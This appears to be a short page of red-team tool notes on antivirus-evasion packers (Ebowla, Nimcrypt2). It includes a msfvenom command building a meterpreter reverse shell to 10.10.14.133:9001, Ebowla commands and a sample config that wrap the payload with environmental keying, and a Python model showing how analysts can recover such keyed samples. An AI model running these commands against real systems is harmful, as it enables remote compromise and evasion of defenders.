# Tools

## Ebowla

We encode a payload that is decoded dynamically at run time on the box. The encoding is keyed on environment variables such as the username, computer name, etc.

* <https://github.com/Genetic-Malware/Ebowla>

```
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe
```

An example genetic.config:

```
...
     output_type = GO 
...
        [[ENV_VAR]]
        username = 'morph3'
        computername = ''
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'acme'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''
```
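Environmental keying seen from the analyst's side, as an added example (not Ebowla's code or its actual key derivation): a simplified model in which the key is a hash of `username` and `userdomain`, as set in the config above. It shows why a sandbox with other values recovers nothing and how a responder can test a host inventory to find which machine a sample was keyed to. The function names, the derivation, the toy cipher and all sample data are assumptions constructed for illustration.

```python
import hashlib
from itertools import product

def derive_key(username: str, userdomain: str) -> bytes:
    # Assumed derivation for this model: SHA-256 over the lower-cased values.
    return hashlib.sha256(f"{username}|{userdomain}".lower().encode()).digest()

def xor_stream(data: bytes, key: bytes) -> bytes:
    # Toy symmetric keystream built from SHA-256(key || offset) blocks.
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)

def make_sample(plaintext: bytes, username: str, userdomain: str):
    """Build a constructed test sample: (ciphertext, SHA-256 check value)."""
    key = derive_key(username, userdomain)
    return xor_stream(plaintext, key), hashlib.sha256(plaintext).digest()

def recover(ciphertext: bytes, check: bytes, usernames, domains):
    """Try each (username, domain) pair; return (user, domain, plaintext) or None."""
    for user, domain in product(usernames, domains):
        candidate = xor_stream(ciphertext, derive_key(user, domain))
        if hashlib.sha256(candidate).digest() == check:
            return user, domain, candidate
    return None

# Constructed data: a harmless marker stands in for the protected content.
MARKER = b"harmless marker standing in for the protected content"
CT, CHECK = make_sample(MARKER, "morph3", "acme")

# Values a generic sandbox might expose vs. a responder's host inventory.
SANDBOX = (["admin", "user", "john"], ["WORKGROUP", "SANDBOX"])
INVENTORY = (["alice", "svc_backup", "MORPH3"], ["ACME", "corp"])

if __name__ == "__main__":
    print("sandbox  :", recover(CT, CHECK, *SANDBOX))
    print("inventory:", recover(CT, CHECK, *INVENTORY))
```

Without the matching values the ciphertext yields nothing to inspect, which is why dynamic analysis of a keyed sample should run with the affected host's environment values, or the key should be searched for offline as above.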

## Nimcrypt2

* <https://github.com/icyguider/Nimcrypt2>

* <https://twitter.com/binitamshah/status/1594698510762332160?s=46&t=LDLfp0MIS1Dsg420TRpKXA>

